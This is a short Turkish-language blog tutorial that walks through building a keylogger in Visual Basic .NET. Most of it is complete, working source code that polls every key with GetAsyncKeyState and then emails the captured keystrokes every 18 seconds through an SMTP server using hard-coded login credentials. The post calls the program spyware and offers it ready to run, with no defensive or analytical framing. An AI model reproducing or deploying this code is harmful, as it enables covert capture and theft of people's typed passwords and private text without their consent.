Visual Basic .NET İle Keylogger Yapımı


Yazımız en son 10 Nisan 2015 tarihinde güncellenmiş ve 362 defa okunmuş.

Bu yazıda, Visual Basic .NET ile ufak ve işlevsel bir Keylogger (casus yazılım) yapacağız. Amacımız, bilgisayarda basılan tuşları kaydederek mail olarak kendimize göndermek. İhtiyacımız olan şeyler;

  1. Bir adet windows form
  2. İki adet timer
  3. Bir adet rich text box

Projemizde mail gönderimi için import edeceğimiz sınıfımız, System.Net.Mail olacak. Bunu da, kodlarımızın başına

Imports System.Net.Mail

satırını ekleyerek yapacağız. İlk timer kontrolümüzün interval değerini 1 olarak ve Enabled özelliğini True olarak ayarlayacağız. İkincisi için ise 18000 ve True olacak. Kodlarımıza gelelim..

Imports System.Net.Mail
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int16
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick

For i = 1 To 255
result = 0
result = (GetAsyncKeyState(i))
If result = -32767 Then
RichTextBox1.Text = RichTextBox1.Text + Chr(i)
End If
Next i
End Sub

Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
Dim MymailMassege As New MailMessage()
MymailMassege.From = New MailAddress("[email protected]") 'Gönderen kişi
MymailMassege.To.Add("[email protected]") 'Hedef mail
MymailMassege.Subject = ("Keylogger Denemesi") 'Konu
MymailMassege.Body = RichTextBox1.Text 'Mesaj
Dim SMTPServer As New SmtpClient("smtp.fatihbasaran.com.tr") 'Giden Mail sunucusu
SMTPServer.Port = 587 'Giden mail sunucu (SMTP) portu
SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "13525252") 'Login yapıyoruz
SMTPServer.EnableSsl = True
SMTPServer.Send(MymailMassege)
RichTextBox1.Text = ("")
End Sub
End Class

Hepsi bu kadar. Programı çalıştırdığınızda işleve başlayacaktır. Sorularınız mı var? Bana yazın.

Fatih M. BAŞARAN